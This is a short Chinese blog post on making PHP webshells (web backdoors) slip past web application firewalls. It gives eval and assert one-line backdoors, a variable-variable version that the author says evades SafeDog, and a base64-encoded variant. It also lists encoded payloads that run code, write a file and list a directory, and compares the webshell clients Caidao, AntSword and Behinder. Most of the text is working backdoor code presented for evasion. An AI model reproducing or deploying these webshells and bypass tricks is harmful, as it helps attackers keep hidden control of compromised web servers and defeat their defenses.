WAF绕过-web后门篇

WAF绕过-web后门篇

常见一句话: 

<?php eval($_POST['abc']);?>

 <?php assert($_POST['abc']);?>

 

 

 

 

变量覆盖

<?php
$a=$_GET['X'];
$$a=$_GET['Y'];
$b($_POST['Z']);
?>
//x=b&y=assert 可以绕过安全狗,但是宝塔会拦截
//assert($_POST['abc'])

下面做加密绕过;
<?php
$a=$_GET['X'];
$$a=$_GET['Y'];
$b(base64_decode($_POST['Z']));
?>

 

 

php在线加密:

行为免杀:

1.自己写轮子

2.自己写免杀

z=cGhwaW5mbygpOw== 执行代码

z=ZmlsZV9wdXRfY29udGVudHMoInRlc3QudHh0IiwiMSIpOw== 写入文件

z=dmFyX2R1bXAoc2NhbmRpcigiLiIpKTs= 读取文件

 

工具生成:webshell-venom-master 随机web-免杀

菜刀,蚁剑,冰蝎优缺点

菜刀:未更新状态,无插件,单向加密传输

蚁剑:更新状态,有插件,拓展性强,单向加密传输

冰蝎:更新状态,未知插件,双向加密传输

 

 

posted @ 2020-09-26 21:57  包子TT  阅读(293)  评论(0)    收藏  举报